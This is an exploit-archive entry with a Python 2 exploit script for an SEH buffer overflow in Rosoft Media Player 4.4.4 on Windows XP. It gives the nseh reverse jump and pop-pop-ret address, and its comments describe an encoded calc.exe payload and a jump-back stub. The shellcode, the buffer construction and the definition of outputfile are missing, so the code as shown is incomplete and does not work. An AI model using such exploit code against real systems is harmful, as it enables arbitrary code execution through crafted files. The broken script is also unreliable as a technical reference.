Rosoft media player 4.4.4 SEH Buffer Overflow

Ruben Garrote Garca 15.08.2010 Verified Vulnerable-App
Local Exploits Windows

Exploit Code


# #######################################################################
# Title:                Rosoft media player 4.4.4 SEH buffer overflow
# Date:                 August 15, 2010
# Author:               dijital1 
# Original Advisory: - abhishek lyall
# Platform:             Windows XP SP3 EN Professional - VMware
# Greetz to:            Corelan Security Team, Exploit-db, OffSec
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                              |"
print "|                                     |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "   -= Exploit for Rosoft media player 4.4.4 (SEH) - dijital1 =-     "



nseh="\xeb\x88\x90\x90" #reverse jump 118 bytes

seh="\x49\xd4\x46\x00" # PPR - 0046D449 - Taken from the exe. The null byte terminates 
		               # the copy but because we have a big area to work with prior to
                       # to reaching the SEH, this exploit is still possible.

# The following shellcode makes use of the GetPC technique for copying EIP into ECX.
# ECX is then adjusted to move execution 775 bytes earlier in the buffer. We need to
# to jump back further than what a short jump will allow hence the following...
# Referenced: phrack #62 Article 7 Originally written by Aaron Adams
# msfencode -i ./768bck.bin -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 107 (iteration=1)


# NOP sled between the main payload and the reverse jump shellcode

# msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 471 (iteration=1)


FILE = open(outputfile, "w")

print "\nExploit written to: " + outputfile + "\n"